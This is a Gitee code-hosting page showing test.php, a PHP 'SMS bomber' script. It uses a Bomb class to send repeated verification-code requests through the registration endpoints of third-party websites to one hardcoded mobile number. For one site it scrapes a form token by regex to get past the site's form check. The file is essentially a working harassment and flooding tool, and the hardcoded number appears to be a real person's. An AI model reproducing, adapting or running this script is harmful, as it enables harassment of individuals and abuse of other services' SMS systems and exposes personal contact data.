加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
test.php 1.09 KB
一键复制 编辑 原始数据 按行查看 历史
FloatX 提交于 2015-07-24 16:12 . test
<?php
date_default_timezone_set('Asia/Shanghai');
if(function_exists('fastcgi_finish_request')) {
exit('End');
}
define('DIR', __DIR__);
require DIR.'/src/Bomb.php';
$args = Helper::parseArgv($argv);
$args['mobile'] = '15801190074';
if(!isset($args['mobile'])) {
echo "Usage: \nphp bomb.php --mobile=11111111111 \n";
exit();
}
$datas1 = array(
array(
'url'=>'http://www.youtaidu.com/register/index.php',
'data'=>'act=sendsms&mobile={$mobile}',
'post'=> true,
'referer'=>'http://www.youtaidu.com/register/'
),
);
$datas2 = array(
array(
'type'=>'complex',
'referer'=> 'https://www.damailicai.com/reg/user.html',
'cookie'=> 'damailicai.cookie',
'match'=> array(
'url'=>'https://www.damailicai.com/reg/user.html',
'data'=> '',
'attributes'=> array('code'=>"#DAMAI_FTOKEN_NAME\"\s+value\=\"(\w+)\"#"),
'ssl_verifypeer'=> true,
),
'list'=> array(
array(
'url'=>'https://www.damailicai.com/reg/user/reg_mobile_code_rand_roobt',
'data'=>'checkcode={$code}&mobile={$mobile}',
'post'=>true,
),
)
)
);
$bomb = new Bomb($args['mobile'], $datas1);
$bomb->send();
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化